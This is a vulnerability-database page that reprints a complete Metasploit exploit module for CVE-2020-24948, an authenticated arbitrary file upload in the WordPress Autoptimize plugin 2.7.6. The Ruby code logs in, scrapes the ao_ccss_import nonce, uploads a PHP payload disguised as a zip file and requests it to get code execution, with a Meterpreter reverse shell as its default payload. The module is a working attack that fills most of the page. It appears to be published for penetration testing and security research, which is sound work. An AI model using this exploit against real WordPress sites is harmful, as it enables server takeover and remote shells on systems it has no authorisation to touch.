Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Autoptimize Shell Upload

🗓️ 08 Jan 2021 00:00:00Reported by Hoa NguyenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 232 Views

The ao_ccss_import AJAX call in WordPress Autoptimize plugin allows high privilege users to upload arbitrary files, such as PHP, leading to RCE

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2020-24948
22 Jun 202100:15
circl
CVE		CVE-2020-24948
3 Sep 202014:06
cve
Cvelist		CVE-2020-24948
3 Sep 202014:06
cvelist
Exploit DB		WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)
8 Jan 202100:00
exploitdb
NVD		CVE-2020-24948
3 Sep 202015:15
nvd
OpenVAS		WordPress Autoptimize Plugin <= 2.7.6 RCE Vulnerability
8 Sep 202000:00
openvas
OSV		CVE-2020-24948
3 Sep 202015:15
osv
Patchstack		WordPress Autoptimize plugin <= 2.7.6 - Authenticated Arbitrary File Upload vulnerability
24 Aug 202000:00
patchstack
Prion		Command injection
3 Sep 202015:15
prion
Prion		Design/Logic Flaw
21 Jun 202120:15
prion
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HTTP::Wordpress  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'Wordpress Autoptimize Authenticated File Upload',  
'Description' => %q{  
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,  
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.  
},  
'Author' =>  
[  
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery  
'Hoa Nguyen - Suncsr Team', # Metasploit module  
'Thien Ngo - Suncsr Team' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2020-24948'],  
['EDB', '48770'],  
['WPVDB', '10372']  
],  
'Privileged' => false,  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'DefaultOptions' => {  
'PAYLOAD' => 'php/meterpreter/reverse_tcp'  
},  
'Targets' => [['WP Autoptimize 2.7.6', {}]],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2020-08-24'))  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),  
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])  
])  
end  
  
def check  
check_plugin_version_from_readme('autoptimize','2.7.7')  
end  
  
def ao_ccss_import_nonce(cookie)  
res = send_request_cgi({  
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),  
'cookie' => cookie,  
'vars_get' => {  
'page' => 'ao_critcss'  
}  
},5)  
  
if res.code == 200  
print_good("Found ao_ccss_import_nonce_code Value!")  
else  
fail_with(Failure::Unknown,'Server did not response in an expected way')  
end  
  
ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]  
return ao_ccss_import_nonce_code  
end  
  
def exploit  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
print_status("Trying to login as #{username}")  
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])  
if cookie.nil?  
print_error("Unable to login as #{username}")  
end  
  
vars = ao_ccss_import_nonce(cookie)  
print_status("Trying to upload payload")  
filename = "#{rand_text_alpha_lower(8)}.php"  
  
data = Rex::MIME::Message.new  
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')  
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')  
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")  
post_data = data.to_s  
print_status("Uploading payload")  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),  
'ctype' => "multipart/form-data; boundary=#{data.bound}",  
'data' => post_data,  
'cookie' => cookie  
})  
  
if res.code == 200  
register_files_for_cleanup(filename)  
else  
fail_with(Failure::Unknown,'Server did not response in an expected way')  
end  
  
print_status("Calling uploaded file #{filename}")  
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2021 00:00Current
EPSS0.23388
wordpressautoptimizefile uploadrcephpsecurity vulnerability
232